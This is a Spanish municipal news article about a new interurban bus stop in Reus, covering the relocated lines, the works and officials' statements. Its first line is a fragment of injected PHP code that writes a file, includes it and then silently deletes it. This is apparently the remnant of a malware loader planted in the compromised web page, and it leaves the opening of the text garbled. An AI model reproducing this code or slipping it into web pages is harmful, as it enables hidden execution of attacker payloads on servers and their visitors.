");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Entra en funcionamiento la nueva parada de buses interurbanos de Reus ante la Biblioteca Xavier Amorós
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Entra en funcionamiento la nueva parada de buses interurbanos de Reus ante la Biblioteca Xavier Amorós (26/07/2021)

La nueva parada de bus interurbano de Reus, llamada Reus Centro (Paseo) y que está situada frente a la Biblioteca Xavier Amorós, entra en funcionamiento hoy lunes, 26 de julio. El nuevo emplazamiento conlleva el traslado de paradas de los autobuses interurbanos de la plaza del Niño de las Ocas con el objetivo de descongestionar la plaza para ofrecer un mejor servicio a los usuarios, y favorecer, al mismo tiempo, la movilidad del tráfico.

La nueva parada de la calle Doctor Frias reúne todas las condiciones de seguridad para sus usuarios y está equipada de marquesinas, bancos y papeleras, y será accesible y adaptada para personas de movilidad reducida. Además, contará con paneles electrónicos informativos visibles y actualizables en cuanto los horarios y las incidencias en los servicios.

El traslado de las líneas de bus

La ordenación en superficie del espacio urbano es competencia municipal, pero la distribución de paradas interurbanas es competencia de la Dirección General de Transportes y Movilidad.

Así, las líneas de bus, que dependen de la Generalidad de Cataluña, quedan repartidas según se indica en el cuadro de la imagen adjunta.

El traslado de las líneas supone un cambio en la distancia y el tiempo de acceso del usuario y también en el recorrido de los servicios interurbanos. Para ello se ha analizado la afectación en estos dos parámetros, para determinar cuáles son las expediciones y las líneas más adecuadas a trasladar. En este sentido, también se ha realizado un estudio de recorridos de todas las líneas para evaluar los impactos del cambio propuesto. Para completar el análisis, el pasado mes de diciembre se realizó una encuesta a los usuarios de la Plaza de las Ocas para determinar los lugares de acceso o difusión.

La nueva estación

El pasado mes de abril se iniciaron los trabajos de arreglo del área de zona azul Riudoms, realizados por Reus Transport, que han contemplado las actuaciones para la construcción de un andén en la calle de l'Escorxador y cuatro más en la calle del Dr. Frias. La obra ha reducido la superficie del área de aparcamiento de 108 a 100 plazas y dos más para personas con movilidad reducida. Las 4 plazas para autocaravanas se han reubicado.

El proyecto, encargado y gestionado por Reus Transport, ha contado con un presupuesto de 40.000 euros. A lo largo del mes de julio los operadores de transporte interurbano han podido hacer pruebas a la nueva parada.

El alcalde de Reus, Carles Pellicer, afirma que "se trata de un proyecto de ciudad que mejora el servicio del bus interurbano, y es una inversión muy esperada por los vecinos y vecinas de la zona que aliviará la densidad de tráfico en la plaza del Niño de las Ocas y mejorará la fluidez. Llevamos mucho tiempo trabajando en este proyecto y, aunque no ha sido fácil, hemos salido y ya lo tenemos aquí. ".

Por su parte, la concejala de Urbanismo y Movilidad, Marina Berasategui, valora que el nuevo emplazamiento "será mucho más cómodo para los usuarios y los operadores de transporte. De la mano de la Generalitat, ofrecemos un mejor servicio a los usuarios. El nuevo emplazamiento mantiene el acceso rápido de los usuarios en el centro de la ciudad y resuelve buena parte de las problemáticas que había hasta ahora ".

La directora general de Transportes y Movilidad, Mercè Rius, considera que "con esta nueva estación, los servicios de autobús interurbanos que pasan por Reus quedan mucho más ordenados, con su espacio exclusivo de parada. Además, los ciudadanos tendrán acceso a una mejor calidad del servicio, tanto desde el punto de vista de la información, como de la accesibilidad y el confort. "

La nueva reordenación permite la coincidencia de varios vehículos (hasta cinco de forma simultánea) en un mismo espacio. Igualmente, la nueva parada mantiene el acceso rápido al centro de la ciudad para los usuarios y para hacer más agradable la espera, dispone de bancos y marquesinas, y ha mantenido todo el arbolado existente.

Fuente: Ayuntamiento de Reus

Entra en funcionamiento la nueva parada de buses interurbanos de Reus ante la Biblioteca Xavier Amorós

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona